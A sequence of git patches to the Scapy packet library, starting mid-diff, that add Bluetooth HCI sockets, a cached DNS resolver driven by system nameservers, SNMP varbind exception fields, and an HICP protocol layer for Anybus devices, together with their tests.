+ sa = sockaddr_hci() + sa.sin_family = socket.AF_BLUETOOTH + sa.hci_dev = adapter_index + sa.hci_channel = HCI_CHANNEL_USER + super().__init__( + socket_domain=socket.AF_BLUETOOTH, + socket_type=socket.SOCK_RAW, + socket_protocol=socket.BTPROTO_HCI, + sock_address=sa) + + def send_command(self, cmd): + opcode = cmd.opcode + self.send(cmd) + while True: + r = self.recv() + if r.type == 0x04 and r.code == 0xe and r.opcode == opcode: + if r.status != 0: + raise BluetoothCommandError("Command %x failed with %x" % (opcode, r.status)) # noqa: E501 + return r + + def recv(self, x=MTU): + return HCI_Hdr(self.ins.recv(x)) + + +class BluetoothMonitorSocket(SuperSocket): + desc = "read/write over a Bluetooth monitor channel" + + def __init__(self): + sa = sockaddr_hci() + sa.sin_family = socket.AF_BLUETOOTH + sa.hci_dev = HCI_DEV_NONE + sa.hci_channel = HCI_CHANNEL_MONITOR + super().__init__( + socket_domain=socket.AF_BLUETOOTH, + socket_type=socket.SOCK_RAW, + socket_protocol=socket.BTPROTO_HCI, + sock_address=sa) + + def recv(self, x=MTU): + return BT_Mon_Hdr(self.ins.recv(x)) + + conf.BTsocket = BluetoothRFCommSocket # Bluetooth From b1fa81116b38c6e89af39c429cb755f538a08a3c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 21 Jul 2023 16:14:03 +0200 Subject: [PATCH 1066/1632] Add conf.nameservers + small dns resolver (#4070) * Fix CacheInstance * Add dns_resolve and conf.nameservers --- scapy/arch/__init__.py | 9 +++- scapy/arch/linux.py | 3 ++ scapy/arch/unix.py | 16 +++++++ scapy/arch/windows/__init__.py | 72 +++++++++++++++++++------------ scapy/config.py | 57 ++++++++++--------------- scapy/interfaces.py | 1 + scapy/layers/dns.py | 77 +++++++++++++++++++++++++++++++++- test/scapy/layers/dns.uts | 14 +++++++ 8 files changed, 187 insertions(+), 62 deletions(-) diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index d4e1d81a9ad..0c1fafac153 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -44,6 +44,7 @@ "get_if_raw_hwaddr", "get_working_if", "in6_getifaddr", + "read_nameservers", "read_routes", "read_routes6", "SIOCGIFHWADDR", @@ -119,6 +120,7 @@ def get_if_raw_addr6(iff): # def get_if_raw_addr(iff) # def get_if_raw_hwaddr(iff) # def in6_getifaddr() +# def read_nameservers() # def read_routes() # def read_routes6() # def set_promisc(s,iff,val=1) @@ -126,7 +128,12 @@ def get_if_raw_addr6(iff): if LINUX: from scapy.arch.linux import * # noqa F403 elif BSD: - from scapy.arch.unix import read_routes, read_routes6, in6_getifaddr # noqa: E501 + from scapy.arch.unix import ( # noqa F403 + read_nameservers, + read_routes, + read_routes6, + in6_getifaddr, + ) from scapy.arch.bpf.core import * # noqa F403 if not conf.use_pcap: # Native diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 793b8eed68b..d4de5d6995e 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -47,6 +47,9 @@ from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket +# re-export +from scapy.arch.unix import read_nameservers # noqa: F401 + # Typing imports from typing import ( Any, diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 2a1459e0612..ae90257eeb1 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -8,6 +8,7 @@ """ import os +import re import socket import struct from fcntl import ioctl @@ -409,3 +410,18 @@ def read_routes6(): fd_netstat.close() return routes + + +####### +# DNS # +####### + +def read_nameservers() -> List[str]: + """Return the nameservers configured by the OS + """ + try: + with open('/etc/resolv.conf', 'r') as fd: + return re.findall(r"nameserver\s+([^\s]+)", fd.read()) + except FileNotFoundError: + warning("Could not retrieve the OS's nameserver !") + return [] diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index d7716faea19..e8b59f3a1df 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -17,9 +17,13 @@ import winreg -from scapy.arch.windows.structures import _windows_title, \ - GetAdaptersAddresses, GetIpForwardTable, GetIpForwardTable2, \ - get_service_status +from scapy.arch.windows.structures import ( + _windows_title, + GetAdaptersAddresses, + GetIpForwardTable, + GetIpForwardTable2, + get_service_status, +) from scapy.consts import WINDOWS, WINDOWS_XP from scapy.config import conf, ProgPath from scapy.error import ( @@ -263,33 +267,33 @@ def _get_mac(x): data = bytearray(x["physical_address"]) return str2mac(bytes(data)[:size]) + def _resolve_ips(y): + # type: (List[Dict[str, Any]]) -> List[str] + if not isinstance(y, list): + return [] + ips = [] + for ip in y: + addr = ip['address']['address'].contents + if addr.si_family == socket.AF_INET6: + ip_key = "Ipv6" + si_key = "sin6_addr" + else: + ip_key = "Ipv4" + si_key = "sin_addr" + data = getattr(addr, ip_key) + data = getattr(data, si_key) + data = bytes(bytearray(data.byte)) + # Build IP + if data: + ips.append(inet_ntop(addr.si_family, data)) + return ips + def _get_ips(x): # type: (Dict[str, Any]) -> List[str] unicast = x['first_unicast_address'] anycast = x['first_anycast_address'] multicast = x['first_multicast_address'] - def _resolve_ips(y): - # type: (List[Dict[str, Any]]) -> List[str] - if not isinstance(y, list): - return [] - ips = [] - for ip in y: - addr = ip['address']['address'].contents - if addr.si_family == socket.AF_INET6: - ip_key = "Ipv6" - si_key = "sin6_addr" - else: - ip_key = "Ipv4" - si_key = "sin_addr" - data = getattr(addr, ip_key) - data = getattr(data, si_key) - data = bytes(bytearray(data.byte)) - # Build IP - if data: - ips.append(inet_ntop(addr.si_family, data)) - return ips - ips = [] ips.extend(_resolve_ips(unicast)) if extended: @@ -306,7 +310,8 @@ def _resolve_ips(y): "mac": _get_mac(x), "ipv4_metric": 0 if WINDOWS_XP else x["ipv4_metric"], "ipv6_metric": 0 if WINDOWS_XP else x["ipv6_metric"], - "ips": _get_ips(x) + "ips": _get_ips(x), + "nameservers": _resolve_ips(x["first_dns_server_address"]) } for x in GetAdaptersAddresses() ] @@ -329,6 +334,7 @@ def __init__(self, provider, data=None): self.cache_mode = None # type: Optional[bool] self.ipv4_metric = None # type: Optional[int] self.ipv6_metric = None # type: Optional[int] + self.nameservers = [] # type: List[str] self.guid = None # type: Optional[str] self.raw80211 = None # type: Optional[bool] super(NetworkInterface_Win, self).__init__(provider, data) @@ -344,6 +350,7 @@ def update(self, data): self.guid = data['guid'] self.ipv4_metric = data['ipv4_metric'] self.ipv6_metric = data['ipv6_metric'] + self.nameservers = data['nameservers'] try: # Npcap loopback interface @@ -640,7 +647,8 @@ def load(self, NetworkInterface_Win=NetworkInterface_Win): 'ipv4_metric': 0, 'ipv6_metric': 0, 'ips': ips, - 'flags': flags + 'flags': flags, + 'nameservers': [], } # No KeyError will happen here, as we get it from cache results[netw] = NetworkInterface_Win(self, data) @@ -1016,3 +1024,15 @@ def __init__(self, *args, **kargs): "winpcap is not installed. You may use conf.L3socket or" "conf.L3socket6 to access layer 3" ) + + +####### +# DNS # +####### + +def read_nameservers() -> List[str]: + """Return the nameservers configured by the OS (on the default interface) + """ + # Windows has support for different DNS servers on each network interface, + # but to be cross-platform we only return the servers for the default one. + return cast(NetworkInterface_Win, conf.iface).nameservers diff --git a/scapy/config.py b/scapy/config.py index a3a79e87ed4..cb183045d9c 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -344,8 +344,8 @@ def lsc(): print(repr(conf.commands)) -class CacheInstance(Dict[str, Any], object): - __slots__ = ["timeout", "name", "_timetable", "__dict__"] +class CacheInstance(Dict[str, Any]): + __slots__ = ["timeout", "name", "_timetable"] def __init__(self, name="noname", timeout=None): # type: (str, Optional[int]) -> None @@ -355,11 +355,8 @@ def __init__(self, name="noname", timeout=None): def flush(self): # type: () -> None - CacheInstance.__init__( - self, - name=self.name, - timeout=self.timeout - ) + self._timetable.clear() + self.clear() def __getitem__(self, item): # type: (str) -> Any @@ -403,20 +400,23 @@ def update(self, # type: ignore def iteritems(self): # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return self.__dict__.items() # type: ignore + return super(CacheInstance, self).items() # type: ignore t0 = time.time() return ( - (k, v) for (k, v) in self.__dict__.items() + (k, v) + for (k, v) in super(CacheInstance, self).items() if t0 - self._timetable[k] < self.timeout ) def iterkeys(self): # type: () -> Iterator[str] if self.timeout is None: - return self.__dict__.keys() # type: ignore + return super(CacheInstance, self).keys() # type: ignore t0 = time.time() return ( - k for k in self.__dict__ if t0 - self._timetable[k] < self.timeout + k + for k in super(CacheInstance, self).keys() + if t0 - self._timetable[k] < self.timeout ) def __iter__(self): @@ -426,39 +426,25 @@ def __iter__(self): def itervalues(self): # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return self.__dict__.values() # type: ignore + return super(CacheInstance, self).values() # type: ignore t0 = time.time() return ( - v for (k, v) in self.__dict__.items() + v + for (k, v) in super(CacheInstance, self).items() if t0 - self._timetable[k] < self.timeout ) def items(self): # type: () -> Any - if self.timeout is None: - return super(CacheInstance, self).items() - t0 = time.time() - return [ - (k, v) for (k, v) in self.__dict__.items() - if t0 - self._timetable[k] < self.timeout - ] + return list(self.iteritems()) def keys(self): # type: () -> Any - if self.timeout is None: - return super(CacheInstance, self).keys() - t0 = time.time() - return [k for k in self.__dict__ if t0 - self._timetable[k] < self.timeout] + return list(self.iterkeys()) def values(self): # type: () -> Any - if self.timeout is None: - return list(self.values()) - t0 = time.time() - return [ - v for (k, v) in self.__dict__.items() - if t0 - self._timetable[k] < self.timeout - ] + return list(self.itervalues()) def __len__(self): # type: () -> int @@ -474,9 +460,9 @@ def __repr__(self): # type: () -> str s = [] if self: - mk = max(len(k) for k in self.__dict__) + mk = max(len(k) for k in self) fmt = "%%-%is %%s" % (mk + 1) - for item in self.__dict__.items(): + for item in self.items(): s.append(fmt % item) return "\n".join(s) @@ -799,8 +785,10 @@ class Conf(ConfClass): ifaces = None # type: 'scapy.interfaces.NetworkInterfaceDict' #: holds the cache of interfaces loaded from Libpcap cache_pcapiflist = {} # type: Dict[str, Tuple[str, List[str], Any, str]] - neighbor = None # type: 'scapy.layers.l2.Neighbor' # `neighbor` will be filed by scapy.layers.l2 + neighbor = None # type: 'scapy.layers.l2.Neighbor' + #: holds the name servers IP/hosts used for custom DNS resolution + nameservers = None # type: str #: holds the Scapy IPv4 routing table and provides methods to #: manipulate it route = None # type: 'scapy.route.Route' @@ -842,6 +830,7 @@ class Conf(ConfClass): stats_classic_protocols = [] # type: List[Type[Packet]] stats_dot11_protocols = [] # type: List[Type[Packet]] temp_files = [] # type: List[str] + #: netcache holds time-based caches for net operations netcache = NetCache() geoip_city = None # can, tls, http and a few others are not loaded by default diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 879cdb95a5e..3bceeac0978 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -287,6 +287,7 @@ def _add_fake_iface(self, ifname): 'guid': "{%s}" % uuid.uuid1(), 'ipv4_metric': 0, 'ipv6_metric': 0, + 'nameservers': [], } if WINDOWS: from scapy.arch.windows import NetworkInterface_Win, \ diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index db3370eb90d..1554a955500 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -14,7 +14,11 @@ import time import warnings -from scapy.arch import get_if_addr, get_if_addr6 +from scapy.arch import ( + get_if_addr, + get_if_addr6, + read_nameservers, +) from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Net from scapy.config import conf @@ -26,7 +30,9 @@ PacketListField, ShortEnumField, ShortField, StrField, \ StrLenField, MultipleTypeField, UTCTimeField, I from scapy.sendrecv import sr1 +from scapy.supersocket import StreamSocket from scapy.pton_ntop import inet_ntop, inet_pton +from scapy.volatile import RandShort from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP from scapy.layers.inet6 import IPv6, DestIP6Field, IP6Field @@ -284,6 +290,7 @@ class DNSStrField(StrLenField): def h2i(self, pkt, x): if not x: return b"." + x = bytes_encode(x) if x[-1:] != b"." and not _is_ptr(x): return x + b"." return x @@ -1046,6 +1053,74 @@ def pre_dissect(self, s): bind_layers(TCP, DNS, dport=53) bind_layers(TCP, DNS, sport=53) +# Nameserver config +conf.nameservers = read_nameservers() +_dns_cache = conf.netcache.new_cache("dns_cache", 300) + + +@conf.commands.register +def dns_resolve(qname, qtype="A", verbose=1, **kwargs): + """ + Perform a simple DNS resolution using conf.nameservers with caching + """ + answer = _dns_cache.get("_".join([qname, qtype])) + if answer: + return answer + + kwargs.setdefault("timeout", 5) + kwargs.setdefault("verbose", 0) + for nameserver in conf.nameservers: + # Try all nameservers + try: + # Spawn a UDP socket, connect to the nameserver on port 53 + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(kwargs["timeout"]) + sock.connect((nameserver, 53)) + # Connected. Wrap it with DNS + sock = StreamSocket(sock, DNS) + # I/O + res = sock.sr1( + DNS(qd=[DNSQR(qname=qname, qtype=qtype)], id=RandShort()), + **kwargs, + ) + except IOError as ex: + if verbose: + log_runtime.warning(str(ex)) + continue + finally: + sock.close() + if res: + # We have a response ! Check for failure + if res[DNS].rcode == 2: # server failure + res = None + if verbose: + log_runtime.info( + "DNS: %s answered with failure for %s" % ( + nameserver, + qname, + ) + ) + else: + break + if res is not None: + # Calc expected qname and qtype + eqname = DNSQR.qname.h2i(None, qname) + eqtype = DNSQR.qtype.any2i_one(None, qtype) + try: + # Find answer + answer = next( + x.rdata + for x in res.an + if x.type == eqtype and x.rrname == eqname + ) + # Cache it + _dns_cache["_".join([qname, qtype])] = answer + return answer + except StopIteration: + # No answer + pass + return None + @conf.commands.register def dyndns_add(nameserver, name, rdata, type="A", ttl=10): diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 27bc8985bbe..285f7404a19 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -17,6 +17,20 @@ def _test(): dns_ans = retry_test(_test) += DNS request using dns_resolve +~ netaccess DNS +* this is not using a raw socket so should also work without root + +val = dns_resolve(qname="google.com", qtype="A") +assert val +assert inet_pton(socket.AF_INET, val) +assert val == conf.netcache.dns_cache["google.com_A"] + +val = dns_resolve(qname="google.com", qtype="AAAA") +assert val +assert inet_pton(socket.AF_INET6, val) +assert val == conf.netcache.dns_cache["google.com_AAAA"] + = DNS labels ~ DNS query = DNSQR(qname=b"www.secdev.org") From 270fe977a715617ef4ef487efc54df3169b1cf9a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 21 Jul 2023 15:05:57 +0000 Subject: [PATCH 1067/1632] Improve dns_resolve --- scapy/layers/dns.py | 52 +++++++++++++++++++++++++-------------- test/scapy/layers/dns.uts | 8 +++--- 2 files changed, 37 insertions(+), 23 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 1554a955500..893e58ac8ca 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -9,6 +9,7 @@ import abc import operator +import itertools import socket import struct import time @@ -1059,15 +1060,27 @@ def pre_dissect(self, s): @conf.commands.register -def dns_resolve(qname, qtype="A", verbose=1, **kwargs): +def dns_resolve(qname, qtype="A", raw=False, verbose=1, **kwargs): """ Perform a simple DNS resolution using conf.nameservers with caching + + :param qname: the name to query + :param qtype: the type to query (default A) + :param raw: return the whole DNS packet (default False) """ - answer = _dns_cache.get("_".join([qname, qtype])) + # Unify types + qtype = DNSQR.qtype.any2i_one(None, qtype) + qname = DNSQR.qname.any2i(None, qname) + # Check cache + cache_ident = b";".join( + [qname, struct.pack("!B", qtype)] + + ([b"raw"] if raw else []) + ) + answer = _dns_cache.get(cache_ident) if answer: return answer - kwargs.setdefault("timeout", 5) + kwargs.setdefault("timeout", 3) kwargs.setdefault("verbose", 0) for nameserver in conf.nameservers: # Try all nameservers @@ -1103,22 +1116,23 @@ def dns_resolve(qname, qtype="A", verbose=1, **kwargs): else: break if res is not None: - # Calc expected qname and qtype - eqname = DNSQR.qname.h2i(None, qname) - eqtype = DNSQR.qtype.any2i_one(None, qtype) - try: - # Find answer - answer = next( - x.rdata - for x in res.an - if x.type == eqtype and x.rrname == eqname - ) - # Cache it - _dns_cache["_".join([qname, qtype])] = answer - return answer - except StopIteration: - # No answer - pass + if raw: + # Raw + answer = res + else: + try: + # Find answer + answer = next( + x + for x in itertools.chain(res.an, res.ns, res.ar) + if x.type == qtype + ) + except StopIteration: + # No answer + return None + # Cache it + _dns_cache[cache_ident] = answer + return answer return None diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 285f7404a19..a6644cd149e 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -23,13 +23,13 @@ dns_ans = retry_test(_test) val = dns_resolve(qname="google.com", qtype="A") assert val -assert inet_pton(socket.AF_INET, val) -assert val == conf.netcache.dns_cache["google.com_A"] +assert inet_pton(socket.AF_INET, val.rdata) +assert val == conf.netcache.dns_cache[b'google.com.;\x01'] val = dns_resolve(qname="google.com", qtype="AAAA") assert val -assert inet_pton(socket.AF_INET6, val) -assert val == conf.netcache.dns_cache["google.com_AAAA"] +assert inet_pton(socket.AF_INET6, val.rdata) +assert val == conf.netcache.dns_cache[b'google.com.;\x1c'] = DNS labels ~ DNS From 5ac3c2886cda533d8602a6f7121a8e35dc197011 Mon Sep 17 00:00:00 2001 From: Christian Sahlmann Date: Thu, 13 Jul 2023 14:35:24 +0000 Subject: [PATCH 1068/1632] add support for exceptions in SNMP varbind responses [RFC 3416](https://datatracker.ietf.org/doc/html/rfc3416#section-3) ``` VarBind ::= SEQUENCE { name ObjectName, CHOICE { value ObjectSyntax, unSpecified NULL, -- in retrieval requests -- exceptions in responses noSuchObject [0] IMPLICIT NULL, noSuchInstance [1] IMPLICIT NULL, endOfMibView [2] IMPLICIT NULL } } ``` Fixes #3900 --- scapy/layers/snmp.py | 16 ++++++++++++---- test/scapy/layers/snmp.uts | 9 ++++++++- 2 files changed, 20 insertions(+), 5 deletions(-) diff --git a/scapy/layers/snmp.py b/scapy/layers/snmp.py index b3a80da8cfe..d6a8bf69e56 100644 --- a/scapy/layers/snmp.py +++ b/scapy/layers/snmp.py @@ -11,7 +11,7 @@ from scapy.asn1packet import ASN1_Packet from scapy.asn1fields import ASN1F_INTEGER, ASN1F_IPADDRESS, ASN1F_OID, \ ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, ASN1F_STRING, ASN1F_TIME_TICKS, \ - ASN1F_enum_INTEGER, ASN1F_field, ASN1F_CHOICE + ASN1F_enum_INTEGER, ASN1F_field, ASN1F_CHOICE, ASN1F_optional, ASN1F_NULL from scapy.asn1.asn1 import ASN1_Class_UNIVERSAL, ASN1_Codecs, ASN1_NULL, \ ASN1_SEQUENCE from scapy.asn1.ber import BERcodec_SEQUENCE @@ -177,9 +177,17 @@ class ASN1F_SNMP_PDU_TRAPv2(ASN1F_SEQUENCE): class SNMPvarbind(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE(ASN1F_OID("oid", "1.3"), - ASN1F_field("value", ASN1_NULL(0)) - ) + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("oid", "1.3"), + ASN1F_optional( + ASN1F_field("value", ASN1_NULL(0)) + ), + + # exceptions in responses + ASN1F_optional(ASN1F_NULL("noSuchObject", None, implicit_tag=0x80)), + ASN1F_optional(ASN1F_NULL("noSuchInstance", None, implicit_tag=0x81)), + ASN1F_optional(ASN1F_NULL("endOfMibView", None, implicit_tag=0x82)), + ) class SNMPget(ASN1_Packet): diff --git a/test/scapy/layers/snmp.uts b/test/scapy/layers/snmp.uts index 987dcecd1d3..b281a4dd5b3 100644 --- a/test/scapy/layers/snmp.uts +++ b/test/scapy/layers/snmp.uts @@ -44,10 +44,17 @@ x = SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.4.0"), value=RandBin()) x = SNMPvarbind(raw(x)) assert isinstance(x.value, ASN1_STRING) += SNMPvarbind noSuchInstance dissection +~ SNMP ASN1 +x = SNMPvarbind(b'0\x10\x06\x0c+\x06\x01\x02\x01/\x01\x01\x01\x01\n\x01\x81\x00') +assert not x.noSuchObject +assert x.noSuchInstance +assert not x.endOfMibView + = Failing SNMPvarbind dissection ~ SNMP ASN1 try: - SNMP('0a\x02\x01\x00\x04\x06public\xa3T\x02\x02D\xd0\x02\x01\x00\x02\x01\x000H0F\x06\x08+\x06\x01\x02\x01\x01\x05\x00\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D') + SNMP(b'0a\x02\x01\x00\x04\x06public\xa3T\x02\x02D\xd0\x02\x01\x00\x02\x01\x000H0F\x06\x08+\x06\x01\x02\x01\x01\x05\x00\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D') assert False except BER_Decoding_Error: pass From 204605b16590615159a7a563ea4d0820a592cd6d Mon Sep 17 00:00:00 2001 From: Lex <55185179+claire-lex@users.noreply.github.com> Date: Wed, 26 Jul 2023 09:25:36 +0200 Subject: [PATCH 1069/1632] Add layer HICP (#4075) --- scapy/contrib/hicp.py | 278 ++++++++++++++++++++++++++++++++++++++++++ test/contrib/hicp.uts | 113 +++++++++++++++++ 2 files changed, 391 insertions(+) create mode 100644 scapy/contrib/hicp.py create mode 100644 test/contrib/hicp.uts diff --git a/scapy/contrib/hicp.py b/scapy/contrib/hicp.py new file mode 100644 index 00000000000..61e7448ec96 --- /dev/null +++ b/scapy/contrib/hicp.py @@ -0,0 +1,278 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2023 - Claire VACHEROT + +"""HICP + +Support for HICP (Host IP Control Protocol). + +This protocol is used by HMS Anybus software for device discovery and +configuration. + +Note : As the specification is not public, this layer was built based on the +Wireshark dissector and HMS's HICP DLL. It was tested with a Anybus X-gateway +device. Therefore, this implementation may differ from what is written in the +standard. +""" + +# scapy.contrib.name = HICP +# scapy.contrib.description = HMS Anybus Host IP Control Protocol +# scapy.contrib.status = loads + +from re import match + +from scapy.packet import Packet, bind_layers, bind_bottom_up +from scapy.fields import StrField, MACField, IPField, ByteField, RawVal +from scapy.layers.inet import UDP + +# HICP command codes +CMD_MODULESCAN = b"Module scan" +CMD_MSRESPONSE = b"Module scan response" +CMD_CONFIGURE = b"Configure" +CMD_RECONFIGURED = b"Reconfigured" +CMD_INVALIDCONF = b"Invalid Configuration" +CMD_INVALIDPWD = b"Invalid Password" +CMD_WINK = b"Wink" +# These commands are implemented in the DLL but never seen in use +CMD_START = b"Start" +CMD_STOP = b"Stop" + +# Most of the fields have the format "KEY = value" for each field +KEYS = { + "protocol_version": "Protocol version", + "fieldbus_type": "FB type", + "module_version": "Module version", + "mac_address": "MAC", + "new_password": "New password", + "password": "PSWD", + "ip_address": "IP", + "subnet_mask": "SN", + "gateway_address": "GW", + "dhcp": "DHCP", + "hostname": "HN", + "dns1": "DNS1", + "dns2": "DNS2" +} + +# HICP MAC format is xx-xx-xx-xx-xx-xx (not with :) as str. +FROM_MACFIELD = lambda x: x.replace(":", "-") +TO_MACFIELD = lambda x: x.replace("-", ":") + +# Note on building and dissecting: Since the protocol is primarily text-based +# but also highly inconsistent in terms of message format, most of the +# dissection and building process must be reworked for each message type. + + +class HICPConfigure(Packet): + name = "Configure request" + fields_desc = [ + MACField("target", "ff:ff:ff:ff:ff:ff"), + StrField("password", ""), + StrField("new_password", ""), + IPField("ip_address", "255.255.255.255"), + IPField("subnet_mask", "255.255.255.0"), + IPField("gateway_address", "0.0.0.0"), + StrField("dhcp", "OFF"), # ON or OFF + StrField("hostname", ""), + IPField("dns1", "0.0.0.0"), + IPField("dns2", "0.0.0.0"), + ByteField("padding", 0) + ] + + def post_build(self, p, pay): + p = ["{0}: {1};".format(CMD_CONFIGURE.decode('utf-8'), + FROM_MACFIELD(self.target))] + for field in self.fields_desc[1:]: + if field.name in KEYS: + value = getattr(self, field.name) + if isinstance(value, bytes): + value = value.decode('utf-8') + if field.name in ["password", "new_password"] and not value: + continue + key = KEYS[field.name] + # The key for password is not the same as usual... + if field.name == "password": + key = "Password" + p.append("{0} = {1};".format(key, value)) + return "".join(p).encode('utf-8') + b"\x00" + pay + + def do_dissect(self, s): + res = match(".*: ([^;]+);", s.decode('utf-8')) + if res: + self.target = TO_MACFIELD(res.group(1)) + s = s[len(self.target) + 3:] + for arg in s.split(b";"): + kv = [x.strip().replace(b"\x00", b"") for x in arg.split(b"=")] + if len(kv) != 2 or not kv[1]: + continue + kv[0] = kv[0].decode('utf-8') + if kv[0] in KEYS.values(): + field = [x for x, y in KEYS.items() if y == kv[0]][0] + setattr(self, field, kv[1]) + + +class HICPReconfigured(Packet): + name = "Reconfigured" + fields_desc = [ + MACField("source", "ff:ff:ff:ff:ff:ff") + ] + + def post_build(self, p, pay): + p = "{0}: {1}".format(CMD_RECONFIGURED.decode('utf-8'), + FROM_MACFIELD(self.source)) + return p.encode('utf-8') + b"\x00" + pay + + def do_dissect(self, s): + res = match(r".*: ([a-fA-F0-9\-\:]+)", s.decode('utf-8')) + if res: + self.source = TO_MACFIELD(res.group(1)) + return None + + +class HICPInvalidConfiguration(Packet): + name = "Invalid configuration" + fields_desc = [ + MACField("source", "ff:ff:ff:ff:ff:ff") + ] + + def post_build(self, p, pay): + p = "{0}: {1}".format(CMD_INVALIDCONF.decode('utf-8'), + FROM_MACFIELD(self.source)) + return p.encode('utf-8') + b"\x00" + pay + + def do_dissect(self, s): + res = match(r".*: ([a-fA-F0-9\-\:]+)", s.decode('utf-8')) + if res: + self.source = TO_MACFIELD(res.group(1)) + return None + + +class HICPInvalidPassword(Packet): + name = "Invalid password" + fields_desc = [ + MACField("source", "ff:ff:ff:ff:ff:ff") + ] + + def post_build(self, p, pay): + p = "{0}: {1}".format(CMD_INVALIDPWD.decode('utf-8'), + FROM_MACFIELD(self.source)) + return p.encode('utf-8') + b"\x00" + pay + + def do_dissect(self, s): + res = match(r".*: ([a-fA-F0-9\-\:]+)", s.decode('utf-8')) + if res: + self.source = TO_MACFIELD(res.group(1)) + return None + + +class HICPWink(Packet): + name = "Wink" + fields_desc = [ + MACField("target", "ff:ff:ff:ff:ff:ff"), + ByteField("padding", 0) + ] + + def post_build(self, p, pay): + p = "To: {0};{1};".format(FROM_MACFIELD(self.target), + CMD_WINK.decode('utf-8').upper()) + return p.encode('utf-8') + b"\x00" + pay + + def do_dissect(self, s): + res = match("^To: ([^;]+);", s.decode('utf-8')) + if res: + self.target = TO_MACFIELD(res.group(1)) + + +class HICPModuleScanResponse(Packet): + name = "Module scan response" + fields_desc = [ + StrField("protocol_version", "1.00"), + StrField("fieldbus_type", ""), + StrField("module_version", ""), + MACField("mac_address", "ff:ff:ff:ff:ff:ff"), + IPField("ip_address", "255.255.255.255"), + IPField("subnet_mask", "255.255.255.0"), + IPField("gateway_address", "0.0.0.0"), + StrField("dhcp", "OFF"), # ON or OFF + StrField("password", "OFF"), # ON or OFF + StrField("hostname", ""), + IPField("dns1", "0.0.0.0"), + IPField("dns2", "0.0.0.0"), + ByteField("padding", 0) + ] + + def post_build(self, p, pay): + p = [] + for field in self.fields_desc: + if field.name in KEYS: + value = getattr(self, field.name) + if isinstance(value, bytes): + value = value.decode('utf-8') + p.append("{0} = {1};".format(KEYS[field.name], value)) + return "".join(p).encode('utf-8') + b"\x00" + pay + + def do_dissect(self, s): + for arg in s.split(b";"): + kv = [x.strip().replace(b"\x00", b"") for x in arg.split(b"=")] + if len(kv) != 2 or not kv[1]: + continue + kv[0] = kv[0].decode('utf-8') + if kv[0] in KEYS.values(): + field = [x for x, y in KEYS.items() if y == kv[0]][0] + if field == "mac_address": + kv[1] = TO_MACFIELD(kv[1].decode('utf-8')) + setattr(self, field, kv[1]) + + +class HICPModuleScan(Packet): + name = "Module scan request" + fields_desc = [ + StrField("hicp_command", CMD_MODULESCAN), + ByteField("padding", 0) + ] + + def do_dissect(self, s): + if len(s) > len(CMD_MODULESCAN): + self.hicp_command = s[:len(CMD_MODULESCAN)] + self.padding = s[len(CMD_MODULESCAN):] + else: + self.padding = RawVal(s) + + def post_build(self, p, pay): + return p.upper() + pay + + +class HICP(Packet): + name = "HICP" + fields_desc = [ + StrField("hicp_command", "") + ] + + def do_dissect(self, s): + for cmd in [CMD_MODULESCAN, CMD_CONFIGURE, CMD_RECONFIGURED, + CMD_INVALIDCONF, CMD_INVALIDPWD]: + if s[:len(cmd)] == cmd: + self.hicp_command = cmd + return s[len(cmd):] + if s[:len("To:")] == b"To:": + self.hicp_command = CMD_WINK + else: + self.hicp_command = CMD_MSRESPONSE + return s + + def post_build(self, p, pay): + p = p[len(self.hicp_command):] + return p + pay + + +bind_bottom_up(UDP, HICP, dport=3250) +bind_bottom_up(UDP, HICP, sport=3250) +bind_layers(UDP, HICP, sport=3250, dport=3250) +bind_layers(HICP, HICPModuleScan, hicp_command=CMD_MODULESCAN) +bind_layers(HICP, HICPModuleScanResponse, hicp_command=CMD_MSRESPONSE) +bind_layers(HICP, HICPWink, hicp_command=CMD_WINK) +bind_layers(HICP, HICPConfigure, hicp_command=CMD_CONFIGURE) 